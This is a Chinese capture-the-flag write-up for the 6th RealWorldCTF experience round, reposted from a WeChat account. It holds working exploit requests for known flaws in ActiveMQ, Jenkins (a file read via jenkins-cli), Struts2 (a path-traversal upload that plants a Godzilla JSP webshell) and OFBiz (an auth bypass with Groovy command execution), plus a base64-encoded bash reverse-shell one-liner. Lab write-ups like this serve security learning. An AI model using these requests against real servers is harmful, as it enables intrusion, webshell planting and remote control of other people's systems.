总结一句话:
太菜了
Be-an-ActiveMq-Hacker:
这里根据题目描述是CVE-2023-46604的漏洞
github找个EXP即可
poc.xml放在VPS并开启http服务
./readflag即可
Be-a-Security-Researcher:
CVE-2024-23897的Jenkins文件读取漏洞
根据这篇文章的复现情况
权限绕过:拥有Overall/Read权限可以读取完整的文件。没有该权限可以读取文件的前几行
删除身份验证测试
java -jar jenkins-cli.jar -s http://127.0.0.1:8080/ -webSocket who-am-i @/flag
即可
Be-More-Elegant:
这题是根据CVE-2023-50164/S2-066的漏洞复现
其中JspFilter.class发现存在以下判断
要传到views目录下的jsp马才能满足
POC:
POST /upload.action HTTP/1.1
Host: 47.99.57.31:8080
Content-Length: 815
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://47.99.57.31:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHLYV7AkIaj17S7aa
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://47.99.57.31:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8,vi;q=0.7
Cookie: JSESSIONID=69B7679A31F420D2F748C066CDF70D04
Connection: close
------WebKitFormBoundary3ZyI4HfPn9dOq0ET
Content-Disposition: form-data; name="FileUpload"; filename="hack.txt"
Content-Type: text/plain
哥斯拉马的内容
------WebKitFormBoundary3ZyI4HfPn9dOq0ET
Content-Disposition: form-data; name="fileUploadFileName";
../../../../views/hack.jsp
------WebKitFormBoundary3ZyI4HfPn9dOq0ET--
Be-a-Framework-Hacker:
这题需要隐藏真实Host绕过,不然发送payload会提示Host不在ip白名单内(这里用到的是Yakit中的Web Fuzzer发包)
CVE-2023-51467的编号
POC:
POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 127.0.0.1:28080
Accept:*/*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5. (windows NT 100; Win64; x64)AppleWebKit/537.36 (KHTML,like Gecko) Chrome/Safari/537.36
Accept-Encoding: gzip,deflate,br
Accept-Language:en-US,en;g=0.9
Connection: close
groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22执行的命令%22.execute%28%29%27%29
最后
bash -c {echo,Base64编码后的Payload} | {base64,-d} | {bash,-i}
反弹shell ./readflag即可
vision:
下载附件进行IDA分析
来到mian函数下进入到sub_1589下分析
我们只能使用strcpy提供的命令,并且这里的showKey的命令由以下if判断,每次showKey都是随机不可能满足cat ./flag的条件
因此,将目光放在可以使用的命令上
固件提供了data命令
可以利用data命令来读取flag
链接:
https://gtfobins.github.io/gtfobins/date/
也就是data -f ./flag即可获取flag
# 往期推荐 #
交流1群已满加微信号PWNCat
~
原文始发于微信公众号(PwnPigPig):第六届RealWorldCTF体验赛部分题解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论